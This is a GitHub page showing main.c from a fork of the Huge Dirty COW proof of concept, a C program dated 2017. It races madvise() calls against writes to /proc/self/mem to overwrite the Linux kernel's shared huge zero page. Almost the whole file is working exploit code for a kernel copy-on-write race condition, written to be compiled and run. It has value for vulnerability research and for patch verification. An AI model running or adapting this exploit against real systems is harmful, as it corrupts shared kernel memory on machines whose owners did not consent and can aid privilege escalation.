forked from bindecy/HugeDirtyCowPOC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmain.c
176 lines (145 loc) · 4.89 KB
/
main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
//
// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.
// Compile with "gcc -pthread main.c"
//
// November 2017
// Bindecy
//
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#define MAP_BASE ((void *)0x4000000)
#define MAP_SIZE (0x200000)
#define MEMESET_VAL (0x41)
#define PAGE_SIZE (0x1000)
#define TRIES_PER_PAGE (20000000)
struct thread_args {
char *thp_map;
char *thp_chk_map;
off_t off;
char *buf_to_write;
int stop;
int mem_fd1;
int mem_fd2;
};
typedef void * (*pthread_proc)(void *);
void *unmap_and_read_thread(struct thread_args *args) {
char c;
int i;
for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.
memcpy(&c, args->thp_map + args->off, sizeof(c));
read(args->mem_fd2, &c, sizeof(c));
lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);
usleep(10); // We placed the zero page and marked its PMD as dirty.
// Give get_user_pages() another chance before madvise()-ing again.
}
return NULL;
}
void *write_thread(struct thread_args *args) {
int i;
for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {
lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);
madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.
write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);
}
return NULL;
}
void *wait_for_success(struct thread_args *args) {
while (args->thp_chk_map[args->off] != MEMESET_VAL) {
madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);
sched_yield();
}
args->stop = 1;
return NULL;
}
int main() {
struct thread_args args;
void *thp_chk_map_addr;
int ret;
// Mapping base should be a multiple of the THP size, so we can work with the whole huge page.
args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (args.thp_map == MAP_FAILED) {
perror("[!] mmap()");
return -1;
}
if (args.thp_map != MAP_BASE) {
fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n");
goto err_unmap1;
}
printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map);
thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge
args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (args.thp_chk_map == MAP_FAILED) {
perror("[!] mmap()");
goto err_unmap1;
}
if (args.thp_chk_map != thp_chk_map_addr) {
fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n");
goto err_unmap2;
}
ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE);
ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);
if (ret) {
perror("[!] madvise()");
goto err_unmap2;
}
args.buf_to_write = malloc(PAGE_SIZE);
if (!args.buf_to_write) {
perror("[!] malloc()");
goto err_unmap2;
}
memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);
args.mem_fd1 = open("/proc/self/mem", O_RDWR);
if (args.mem_fd1 < 0) {
perror("[!] open()");
goto err_free;
}
args.mem_fd2 = open("/proc/self/mem", O_RDWR);
if (args.mem_fd2 < 0) {
perror("[!] open()");
goto err_close1;
}
printf("[*] Racing. Gonna take a while...\n");
args.off = 0;
// Overwrite every single page
while (args.off < MAP_SIZE) {
pthread_t threads[3];
args.stop = 0;
ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);
ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);
ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);
if (ret) {
perror("[!] pthread_create()");
goto err_close2;
}
pthread_join(threads[0], NULL); // This call will return only after the overwriting is done
pthread_join(threads[1], NULL);
pthread_join(threads[2], NULL);
args.off += PAGE_SIZE;
printf("[*] Done 0x%lx bytes\n", args.off);
}
printf("[*] Success!\n");
err_close2:
close(args.mem_fd2);
err_close1:
close(args.mem_fd1);
err_free:
free(args.buf_to_write);
err_unmap2:
munmap(args.thp_chk_map, MAP_SIZE);
err_unmap1:
munmap(args.thp_map, MAP_SIZE);
if (ret) {
fprintf(stderr, "[!] Exploit failed.\n");
}
return ret;
}